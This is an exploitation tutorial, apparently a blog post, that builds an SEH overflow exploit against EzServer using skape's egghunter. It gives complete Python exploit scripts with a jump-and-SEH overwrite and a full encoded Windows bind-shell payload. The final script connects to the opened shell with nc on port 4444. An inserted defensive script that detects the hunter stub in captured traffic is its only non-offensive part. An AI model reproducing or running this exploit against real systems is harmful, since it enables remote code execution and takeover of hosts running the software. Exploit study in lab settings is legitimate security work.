Software Exploitation : Ezserver Using Egghunter
Exploit : Ezserver using Egghunter
In the last post I showed how to exploit ezserver to pop the calculator app. It was a good proof of concept, but there is a problem: we can't place our payload where ESP points. That space is too small for our shellcode, while the buffer itself is huge. The technique now is to use an egghunter. An egghunter is a small piece of code that searches memory for our shellcode: it looks for a "keyword" (the egg) and, once the keyword is found, executes the code that follows it.
In this post I will use the egghunter code from skape and from this website.
So here is our plan for the fuzzer:
[+] How it works
- Previously the buffer was filled with "A"s; now we fill it with our shellcode and adjust the lengths so everything still lines up with the EIP offset.
5884 - 100 - 352 = 5432 bytes
- Our shellcode with "w00tw00t" (the egg) prepended.
8 + 344 = 352 bytes
- Egghunter code
[+] Try the hunter
- Next, check that the egghunter code works by placing \xCC (int3) bytes after the egg to stop execution of the application in the debugger.
- Open OllyDbg and attach it to the ezserver application.
- Run the script below with our \xcc bytes and the adjusted alignment.
import socket

awalan="\x90" * (5784 - 12)
cece=("w00tw00t" +"\xcc\xcc\xcc\xcc")
buffer = "\x90" * 100
offset="\xeb\x06\x90\x90"
popret="\x96\x96\x20\x10"
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
akhiran="\x90" * (250 - len(egghunt))
LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((LHOST,LPORT))
sock.send( awalan+ cece + buffer + offset + popret + nopsled + egghunt + akhiran )
print ("[+] Buffer send success..\n")
sock.close()
- Pass the exception in Olly and wait a few seconds; then it hits our \xCC.
- This means our egghunter code is running and has successfully found our code, in this case the four "\xCC" bytes.
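As an added example that is not part of the original post: a small Python 3 script (my own names: find_egghunters, analyse, build_sample) that a defender can run over a captured request to spot the skape int 0x2e hunter stub used above, recover its tag from the `mov eax, imm32` immediate, and locate the 8-byte egg that the two `scasd` compares look for. The sample request is constructed here with 0xCC marker bytes in place of any shellcode, exactly as in the hunter test.

```python
# Constructed example (not part of the original post): locate the skape int 0x2e
# egghunter stub shown above in a captured request and recover its tag and egg.
HUNTER_HEAD = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
HUNTER_TAIL = b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  # scasd; jnz; scasd; jnz; jmp edi


def _find_all(data, needle):
    """All offsets of needle in data (overlapping matches included)."""
    out, i = [], data.find(needle)
    while i >= 0:
        out.append(i)
        i = data.find(needle, i + 1)
    return out


def find_egghunters(data):
    """(offset, tag) for each stub: 18-byte head, then `mov eax, tag`, then the tail."""
    hits = []
    for i in _find_all(data, HUNTER_HEAD):
        tag = data[i + 18:i + 22]          # the 4 immediate bytes of mov eax, imm32
        if len(tag) == 4 and data[i + 22:i + 32] == HUNTER_TAIL:
            hits.append((i, tag))
    return hits


def analyse(data):
    """For each hunter, report where its egg (tag twice) sits and where execution lands."""
    report = []
    for off, tag in find_egghunters(data):
        eggs = _find_all(data, tag * 2)    # two scasd compares => 8-byte egg
        report.append({
            "hunter_offset": off,
            "tag": tag,
            "egg_offsets": eggs,
            "land_offsets": [e + 8 for e in eggs],  # jmp edi after two scasd => egg + 8
        })
    return report


def build_sample():
    """Constructed request mirroring the post's layout, with 0xCC instead of shellcode."""
    return (b"\x90" * 64                      # filler
            + b"w00tw00t" + b"\xcc" * 4       # egg + marker bytes (the post's hunter test)
            + b"\x90" * 32                    # padding
            + HUNTER_HEAD + b"w00t" + HUNTER_TAIL
            + b"\x90" * 8)


if __name__ == "__main__":
    for entry in analyse(build_sample()):
        print(entry)
```

The same scan works on any captured buffer, since the tag is read from the stub rather than hard-coded, so a hunter with a different egg than "w00t" is still reported.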
[+] Connecting
- The running script.
- Win.
[+] Connecting
- So far our code is running okay; now we will use a Windows bind shell on port 4444 as our payload.
- Here is my final code.
#!/usr/bin/python
import socket, sys, os
from time import sleep
print "\n ================================= "
print " > EZServer SEH Overflow <"
print " > Written by aldo <"
print " > i-s-2-c <"
print " =================================\n"
awalan="\x90" * (5784 - 352) #len(payload)
payload=("w00tw00t" +
"\xdb\xd3\xba\xd2\x1b\x8d\xdf\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5f"
"\x31\x57\x17\x03\x57\x17\x83\x3d\xe7\x6f\x2a\x3d\x72\x9b\x98\x55"
"\x7a\xa4\xdc\x5a\x1d\xd0\x4f\x80\xfa\x6d\xca\xf4\x89\x0e\xd0\x7c"
"\x8f\x01\x51\x33\x97\x56\x39\xeb\xa6\x83\x8f\x60\x9c\xd8\x11\x98"
"\xec\x1e\x88\xc8\x8b\x5f\xdf\x17\x55\x95\x2d\x16\x97\xc1\xda\x23"
"\x43\x32\x0b\x26\x8e\xb1\x14\xec\x51\x2d\xcc\x67\x5d\xfa\x9a\x28"
"\x42\xfd\x77\xd5\x56\x76\x0e\xb5\x82\x94\x70\x86\xfa\x7f\x16\x83"
"\xbe\x4f\x5c\xd3\x4c\x3b\x12\xcf\xe1\xb0\x93\xe7\xa7\xae\x9d\xb9"
"\x59\xc3\xf2\xba\xb0\x7d\xa0\x22\x55\xb1\x74\xc2\xd2\xc6\x4a\x4d"
"\x49\xd6\x7b\x19\xba\xc5\x80\xe2\x6c\xe9\xaf\x4b\x04\xf0\x36\xf2"
"\xfb\xf3\xb4\xa1\x69\x06\x46\x99\x06\xdf\xb1\xec\x7a\x88\x3e\xd8"
"\xd6\x64\x92\xb7\x8b\xc9\x47\x74\x7f\x31\xb7\x1c\x17\xdc\x64\x86"
"\xb4\x57\x75\xd3\x53\xcc\x6c\xab\x64\x5b\x6e\x9d\x01\x74\xc1\x74"
"\x29\xa4\x89\xd2\x78\x6b\xa3\x4d\x7c\xa2\x60\x24\x7d\x9b\xef\x23"
"\xc8\x9a\xb9\xfc\x34\x74\x69\x56\x9f\x2c\x75\x86\x8c\xa7\x6e\x5f"
"\x75\x4e\x26\x60\xaf\xe4\x37\x4e\x36\x6d\xac\x08\xdf\x12\x41\x5d"
"\xfa\xbf\xc9\x04\x2c\x8c\x63\x51\x44\x48\xfd\x7f\xa8\x90\x0e\xd5"
"\x35\x52\xdc\xd7\x88\x7f\x8d\xaa\x77\xb8\x1a\x1f\x2c\xd0\x2e\xa1"
"\x80\x37\x30\x28\xa3\xc8\x18\x89\x7c\x65\xf4\x7c\xd2\xe3\xf7\x2f"
"\x85\xa6\xa6\x30\xf5\x21\xe4\x17\xf3\x7f\xa5\x58\x2a\x15\xb5\x59"
"\xe4\x15\x99\x2e\x5c\x16\x99\xf4\x07\x19\x48\xa6\x38\x35\x1d\x38"
"\x1f\x54\xad\x97\x60\x4f\xad\xc7") # size 344 + 8 = 352
buffer = "\x90" * 100 #align the stack (awalan = 5884 minus 100)
offset="\xeb\x06\x90\x90" #jmp 6 bytes
popret="\x96\x96\x20\x10" #SEH position -> EIP
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 byte egghunter
akhiran="\x90" * (250 - len(egghunt))
LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
try:
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((LHOST,LPORT))
    sock.send(awalan+ payload + buffer + offset + popret + nopsled + egghunt + akhiran )
    print ("[+] Buffer send success..\n")
    sock.close()
    print "[+] Wait for hatch (0)..\n"
    sleep(5)
    print "[+] Connecting...\n"
    sleep(9)
    os.system("nc -n %s 4444" %LHOST)
except:
    print "[-] Could not connect to %s on port %d\n" % (LHOST,LPORT)
    sys.exit(0)
- Run the Ezserver application.
- The running script.
- Win.